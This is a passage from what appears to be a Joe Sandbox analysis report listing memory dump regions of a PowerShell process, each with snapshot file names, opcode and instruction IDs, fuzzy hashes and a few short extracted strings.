                                                                                                        • Opcode Fuzzy Hash: 607c8afbdd08d816989a1b44786052729cb68c3b2a3a08aa91ed27382f5c8940
                                                                                                        • Instruction Fuzzy Hash: 95E0BFB4915208DFCB44DFE8C54569CFBF4AB49214F1080ADD90897341EB329A46CB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70ae733e29bc501642d5c79369b4ae1932da6d9f79c1532038311b8ec219413d
                                                                                                        • Instruction ID: 930d0e884bb9173deff42b8e5d9ae9b998f7952fb40d64ce09d62aac0f532d0e
                                                                                                        • Opcode Fuzzy Hash: 70ae733e29bc501642d5c79369b4ae1932da6d9f79c1532038311b8ec219413d
                                                                                                        • Instruction Fuzzy Hash: E4E0BF74929118EFC744DFA8C94569CBBF4AB49214F2080A9D90897351D671DA42DB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction ID: b33f95145d66bcf4b813bae40aa99db5aa66f8c3576c49f3fd6dd607be7c3358
                                                                                                        • Opcode Fuzzy Hash: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction Fuzzy Hash: C1E0ECB894910CEBCB04DBE4D9459ACBBB8AB5A314F20819DD80967381CB329E42DB85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction ID: 707fdaa15b0049bfd3881940f2c3a345a384a67fbf1f9b0da5a451deebafe452
                                                                                                        • Opcode Fuzzy Hash: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction Fuzzy Hash: A1E08C74909108DBCB04EFE8D9419ACBBB8AB59314F10809CCC0913380CB329E42CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction ID: 2f93cdd4db526c3612331384b261d9a66346068bf1450e6a1a98ed3063693f9f
                                                                                                        • Opcode Fuzzy Hash: 6d7aacc60c76dea61830d3793d03a42ecd0bac41ec5f63afccd961404e078fbd
                                                                                                        • Instruction Fuzzy Hash: AEE0EC78909108DBCB04DFE4D985AACFBB8AB49314F51819DD80817381CB329F42DB85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6deeb2f7318ec0c4d62d1fbeabcba865f5fe4fe2a230bee80569645c1c1885d5
                                                                                                        • Instruction ID: cc8ac152270796a06c654bcc9722b0b933a132fdf70eb76af98e5c3097da715a
                                                                                                        • Opcode Fuzzy Hash: 6deeb2f7318ec0c4d62d1fbeabcba865f5fe4fe2a230bee80569645c1c1885d5
                                                                                                        • Instruction Fuzzy Hash: 04E01A74A152188FE724CF28DD5AB9DBBB2EF46300F805095E80EAB751CA309D86CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8fc50dc59439420c23954b2626710d7bace82d4f0759fd23bf4ed3d879d7e8f0
                                                                                                        • Instruction ID: b6c5edb20f15c29489d89fcd22798b184abdf6e40d80845de4d3a4fdf8e24030
                                                                                                        • Opcode Fuzzy Hash: 8fc50dc59439420c23954b2626710d7bace82d4f0759fd23bf4ed3d879d7e8f0
                                                                                                        • Instruction Fuzzy Hash: 3CE012B0D6522DEFCB80DFB8D54969CBBF8EB19211F5080A9DC4893340EB719A95DB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f2f9efc6f8548b4a5c7a62da2f273ee7c5e275dc8d496162c8763ed7ddfac4c
                                                                                                        • Instruction ID: 0f1f1de7094639e1f5f91dc84701a9bb43c7f7ad122e14041fea724f2603b2ab
                                                                                                        • Opcode Fuzzy Hash: 2f2f9efc6f8548b4a5c7a62da2f273ee7c5e275dc8d496162c8763ed7ddfac4c
                                                                                                        • Instruction Fuzzy Hash: F9E0E5749152189FDB11CF94D884BEEBBB9BB4D300F4001DAE549A7381D734AA808F50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 56391fd90cb8e21c834ad03c8c39d025992289f780dfdccd841abff60bd98024
                                                                                                        • Instruction ID: 1517b32e36d09594e581d4f8a4b28f3e6c7d738c3326e3ae61db48b3386b057a
                                                                                                        • Opcode Fuzzy Hash: 56391fd90cb8e21c834ad03c8c39d025992289f780dfdccd841abff60bd98024
                                                                                                        • Instruction Fuzzy Hash: 47E0C274805108DFC744DBE9CA426ACFFB8AB09210F2080DDCC4953381DB32AE52CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a7ecd3f78617581cd999dd4cd76c042e45cab1e75abe19117033e8ac4f861a7
                                                                                                        • Instruction ID: b0e6cad6da447b19c030a87e730019e7ca376e45843dbcadb873851c9534a343
                                                                                                        • Opcode Fuzzy Hash: 7a7ecd3f78617581cd999dd4cd76c042e45cab1e75abe19117033e8ac4f861a7
                                                                                                        • Instruction Fuzzy Hash: 99E012A550E7D29FCB434F2488644E0BF30AE2350471A48C3C0D5CF1A3D318591FEB66
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6762f3af367e12ac27a7ac548a37028dfef699a6c5537d0b578ebe75e3e97a0e
                                                                                                        • Instruction ID: 9af41b3148972e7f2b56868d85c573e4953cd424beb7ffd4874b82386bfd82ae
                                                                                                        • Opcode Fuzzy Hash: 6762f3af367e12ac27a7ac548a37028dfef699a6c5537d0b578ebe75e3e97a0e
                                                                                                        • Instruction Fuzzy Hash: A5E0E578E102188FD729DBA4E899BDD7771FB99301F8019DAD4096B380CB706D849FA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 31ec6f3d71c00a2663350afecaf28a23e0ca9c136dbbf6d599bb92ee866844f4
                                                                                                        • Instruction ID: b5c15887a11ec446fbb4c473b9025cfb6d817581c93fcf737e9dc99e0283d28f
                                                                                                        • Opcode Fuzzy Hash: 31ec6f3d71c00a2663350afecaf28a23e0ca9c136dbbf6d599bb92ee866844f4
                                                                                                        • Instruction Fuzzy Hash: DAC04C76E1011E9BCF40DBD9E4409DCF774EF95361F004036D214BB104D6345926CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TJxq$Tesq$pwq$xbvq
                                                                                                        • API String ID: 0-2278277230
                                                                                                        • Opcode ID: e8ea17e57c94d8bbeeedbf8ed4e04acd992fa609daeba5bf3f75323f9f69e9b1
                                                                                                        • Instruction ID: d2dc1cb2fda836615d0212dbd924a3d8f42c0318ea5f78a3f400f665f78860a0
                                                                                                        • Opcode Fuzzy Hash: e8ea17e57c94d8bbeeedbf8ed4e04acd992fa609daeba5bf3f75323f9f69e9b1
                                                                                                        • Instruction Fuzzy Hash: B1A28575E00628CFDB65CF69C984A99BBB2FF89304F1581E9D509AB361DB319E81CF40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TJxq$Tesq$xbvq
                                                                                                        • API String ID: 0-371669003
                                                                                                        • Opcode ID: 25f8c24862175060089d1f6155c49be890421ecb4a8034d7cd2384b8ba9dbe06
                                                                                                        • Instruction ID: e29e84dbf4bde935f9360ff85801a7dcb70e521e1216c4a0849a531972d97617
                                                                                                        • Opcode Fuzzy Hash: 25f8c24862175060089d1f6155c49be890421ecb4a8034d7cd2384b8ba9dbe06
                                                                                                        • Instruction Fuzzy Hash: 9EC17775E016188FDB58CF6AC944ADDBBF2BF89300F14C1AAD909AB365DB705A81CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TJxq$Tesq$xbvq
                                                                                                        • API String ID: 0-371669003
                                                                                                        • Opcode ID: a197e6d408d550d46c8b85fe510846b5a1d8582499d198e24449c03732384c0a
                                                                                                        • Instruction ID: 1a98f3aa14c318caf5e0de28f04e12ecc85900e7e584349a86815a2e8ca95d2a
                                                                                                        • Opcode Fuzzy Hash: a197e6d408d550d46c8b85fe510846b5a1d8582499d198e24449c03732384c0a
                                                                                                        • Instruction Fuzzy Hash: A4A17775E016188FDB58CF6AC944ADDBBF2BF89300F1481AAD409AB365DB709E81CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fxq$8
                                                                                                        • API String ID: 0-2186212692
                                                                                                        • Opcode ID: 99e39f10a879a49183a8ddd40f7b77ade68703ee5ecf3dbef21f29ad9b75533b
                                                                                                        • Instruction ID: 78ea390fb18b611c0e3a2bea5b0946f7e34edb97b3de86aec4d85bd000e5170e
                                                                                                        • Opcode Fuzzy Hash: 99e39f10a879a49183a8ddd40f7b77ade68703ee5ecf3dbef21f29ad9b75533b
                                                                                                        • Instruction Fuzzy Hash: 4052C7B5E00629CFDB65DF68D854AD9B7B1FB99300F5086EAD409A7350DB30AE81CF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq$Tesq
                                                                                                        • API String ID: 0-1365298620
                                                                                                        • Opcode ID: cae0c911536da11a7ce161ffaa7c67a99f0804b7908978d4cc02b7b0d0b5d271
                                                                                                        • Instruction ID: e6f0b5d2d06b5506022ab1ce1bf1e2f9a055d81fab84f287714ded023f0330bb
                                                                                                        • Opcode Fuzzy Hash: cae0c911536da11a7ce161ffaa7c67a99f0804b7908978d4cc02b7b0d0b5d271
                                                                                                        • Instruction Fuzzy Hash: 41020BB4E15229CFDB64CF68D845B9DB7B2FB89300F5090AAD409AB354DB70AD86CF11
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (wq$,wq
                                                                                                        • API String ID: 0-2981683845
                                                                                                        • Opcode ID: 235be53acb74254af7deaa1917386784b365b4c57947b2af954731d05f85f4a8
                                                                                                        • Instruction ID: 65813057eec863247f97d04128bcc30eca3da2ae3f48dcfd7b2efbd57b846684
                                                                                                        • Opcode Fuzzy Hash: 235be53acb74254af7deaa1917386784b365b4c57947b2af954731d05f85f4a8
                                                                                                        • Instruction Fuzzy Hash: 71D12DB4E10555DFDB14DF68C588AA9BBF2FF88300F268499E4059B361DB34EC82EB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: a3db8b9bfb65012edff71fcb09b0db9639351315e5bb8370f118830999e35511
                                                                                                        • Instruction ID: 2f1e06f274941d50401510e9d235da1942ef1fbd0c757aef02e9ba86a69c8c80
                                                                                                        • Opcode Fuzzy Hash: a3db8b9bfb65012edff71fcb09b0db9639351315e5bb8370f118830999e35511
                                                                                                        • Instruction Fuzzy Hash: 18713FB1E112048FE709DF6AD88269DBBF2FBC8310F04E56AE8059B354DF706446CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fxq$h
                                                                                                        • API String ID: 0-3911558304
                                                                                                        • Opcode ID: bb15c91a0a22a6fae50f2bb11bf786220332bc8162183d82db944cd742189e18
                                                                                                        • Instruction ID: 50f91f347b8769c6c6d44f7c45a6f2998104af53b42298d3cd3a72d2b9f35aa5
                                                                                                        • Opcode Fuzzy Hash: bb15c91a0a22a6fae50f2bb11bf786220332bc8162183d82db944cd742189e18
                                                                                                        • Instruction Fuzzy Hash: EA812C75E00629CFDB15DFA9C8547C9BBB2FF89300F5481EAD409AB250DB306A85CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: 25e5608fafe1495e313fa2471ab9e317dac5511545bc27be7ef9069b332971f3
                                                                                                        • Instruction ID: b7d2c05f028a2d00e7b9cc6a717d36e66b1d10bc8551d371ff082ebf2f304c42
                                                                                                        • Opcode Fuzzy Hash: 25e5608fafe1495e313fa2471ab9e317dac5511545bc27be7ef9069b332971f3
                                                                                                        • Instruction Fuzzy Hash: 9471ED70E116448FD709DF6AD88169DBBF2FBC8310F04E56AE8059B364DF7024468B91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq
                                                                                                        • API String ID: 0-136783293
                                                                                                        • Opcode ID: beef7e561189313673106e5cf79228335d26f444f13499eb925b141c9944508b
                                                                                                        • Instruction ID: 0124b87caaea319f51e74992aa10d10e5f145a007de95884a034335cbdd42c6c
                                                                                                        • Opcode Fuzzy Hash: beef7e561189313673106e5cf79228335d26f444f13499eb925b141c9944508b
                                                                                                        • Instruction Fuzzy Hash: 89B12BB0E24229DFEB54DF69D944B9DBBF2BB49300F1090A6D449BB350DB70A986DF00
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq
                                                                                                        • API String ID: 0-136783293
                                                                                                        • Opcode ID: de9a166cd6268510da524db9e46a96c9d75e1c4cd63dae25b674359fc6d654ed
                                                                                                        • Instruction ID: 4ca71cc84ceb0d00617b73aaeb0d393528960b7ee8dd34fa66ab2220c9f320b4
                                                                                                        • Opcode Fuzzy Hash: de9a166cd6268510da524db9e46a96c9d75e1c4cd63dae25b674359fc6d654ed
                                                                                                        • Instruction Fuzzy Hash: E7B12AB4E25219DFEB14CFA9D945B9DBBF2BB49300F1080A6D449BB350DB70A986DF00
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !
                                                                                                        • API String ID: 0-2657877971
                                                                                                        • Opcode ID: 6e3a2ed0cc966738710bc159a3d9e6a3425d5cf4d45fd82327d6450af44f319c
                                                                                                        • Instruction ID: 5a1b36fe170f49a2db68ccf71cf8d685989ddf5b346642ff3dda7c39658ad08d
                                                                                                        • Opcode Fuzzy Hash: 6e3a2ed0cc966738710bc159a3d9e6a3425d5cf4d45fd82327d6450af44f319c
                                                                                                        • Instruction Fuzzy Hash: D4A11874E15218CFDB28CFA9D855BDDBBB2BB99300F5090AAD409A7390DB309E81CF41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a2af1a8bea7c4e794b04806ea6346cba7c73f9caeb4ab673e95e5f09948a73be
                                                                                                        • Instruction ID: e93f431fea0405edc33714197fdb1e620c2535c67a3bccceed58904438bea68a
                                                                                                        • Opcode Fuzzy Hash: a2af1a8bea7c4e794b04806ea6346cba7c73f9caeb4ab673e95e5f09948a73be
                                                                                                        • Instruction Fuzzy Hash: E012C271E046188FDB54DFAAC98069EFBF2BF88344F64C169D418AB219D734A986CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fafa85914cb0e0777903fa22aa15c3fca6849e18589ae5637d64809fff7d6275
                                                                                                        • Instruction ID: 2fbb21c37837379e7343e67e24a83cffbed70fc2ce8f2e6738f493ef11b0bc06
                                                                                                        • Opcode Fuzzy Hash: fafa85914cb0e0777903fa22aa15c3fca6849e18589ae5637d64809fff7d6275
                                                                                                        • Instruction Fuzzy Hash: E8C16074E20208CFDB14DFA9D445BEDBBB1EB4A300F50906AE40AAB795CB746D45CFA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1cb0fa76704914193760abebe27df5f5f13c27d624b69910ebfed223a0e8f631
                                                                                                        • Instruction ID: 2bdab3a38aa4c00df91718226b1a2641d6a291844a15b826bb503157d58d9210
                                                                                                        • Opcode Fuzzy Hash: 1cb0fa76704914193760abebe27df5f5f13c27d624b69910ebfed223a0e8f631
                                                                                                        • Instruction Fuzzy Hash: 8BC17FB4E20208CFDB14DFA9D445BEDBBB1EB4A300F50506AE40AAB395CB746D45CFA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e69a2449c2ab5b2fbbd3de05859da26879f366650736582d614b0c7272104f5d
                                                                                                        • Instruction ID: bdf4cfaebc0a8916e1a0f1fa29be39cb4d79644aae5efc5f6e363ead252b7546
                                                                                                        • Opcode Fuzzy Hash: e69a2449c2ab5b2fbbd3de05859da26879f366650736582d614b0c7272104f5d
                                                                                                        • Instruction Fuzzy Hash: 42A11AB4A21249CFDB44DFA8D445BDDBBF1FB49300F50516AE409AB381DB74A942CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2d462d60586e825a26d229c21fdec7663e32c6b09cbe758dead781497a0e9498
                                                                                                        • Instruction ID: 88a60db7d78a884c074e3d7c743e2eb0496768afd5c8b83498d75459a27bfa32
                                                                                                        • Opcode Fuzzy Hash: 2d462d60586e825a26d229c21fdec7663e32c6b09cbe758dead781497a0e9498
                                                                                                        • Instruction Fuzzy Hash: DF710570D14219DFEB84EFAAD8847ADBBF2FF89300F2494A9E415A7250D7745841CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ce57da764ddb2c0452e3a7e48ab6fa704e05fc2f9d8f940b37f28847284ca9ac
                                                                                                        • Instruction ID: 7ed56eb5a17c622119600da8e583bf3ebcb9f56d321bd475bf962d5f0b81aaa6
                                                                                                        • Opcode Fuzzy Hash: ce57da764ddb2c0452e3a7e48ab6fa704e05fc2f9d8f940b37f28847284ca9ac
                                                                                                        • Instruction Fuzzy Hash: 0B610270D14219CFDB85EFAAC8847ADBBF2BF89300F2495AAE425A7250D7745941CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc4c0c42e941c023c3c49165c8f8dbd42abc23e448381ebb514a3156445a83ba
                                                                                                        • Instruction ID: d72c1ec2c445dfdfe4a2d6306c4546e6fbc74d1e217fb87f9eee6fa28da7fa92
                                                                                                        • Opcode Fuzzy Hash: dc4c0c42e941c023c3c49165c8f8dbd42abc23e448381ebb514a3156445a83ba
                                                                                                        • Instruction Fuzzy Hash: 1A5199B1E056588BDB08CFABC94059EFBF3AFC9300F18C07AD958AB264DB3059468F54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1eebcf0d111c617b6985aa5cf0f02d7eae7226e2bede7c2f169cbf7d9f3f71bf
                                                                                                        • Instruction ID: 6385c1fe1ffa3395eb49b51dafb4cdf57e25dd699a003213991996a83e68ca6b
                                                                                                        • Opcode Fuzzy Hash: 1eebcf0d111c617b6985aa5cf0f02d7eae7226e2bede7c2f169cbf7d9f3f71bf
                                                                                                        • Instruction Fuzzy Hash: D84158B5E016198BDB08CFABC94059EFBF3AFC8310F14C17AD958AB264DB3459468F54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f7cad8dcfea3b08ea87b2b02bdb1ab8a087ecb13a434ed5fac136e22bb8a255
                                                                                                        • Instruction ID: 5786f73cd3aff77d7b730c2598b7c63d20bc368eb6301d8e4bcba03cd325365c
                                                                                                        • Opcode Fuzzy Hash: 0f7cad8dcfea3b08ea87b2b02bdb1ab8a087ecb13a434ed5fac136e22bb8a255
                                                                                                        • Instruction Fuzzy Hash: 23413C71D093588FEB55CF66CC446DABBB2AF8A300F44C1E6D808AB255DB740E89CF51
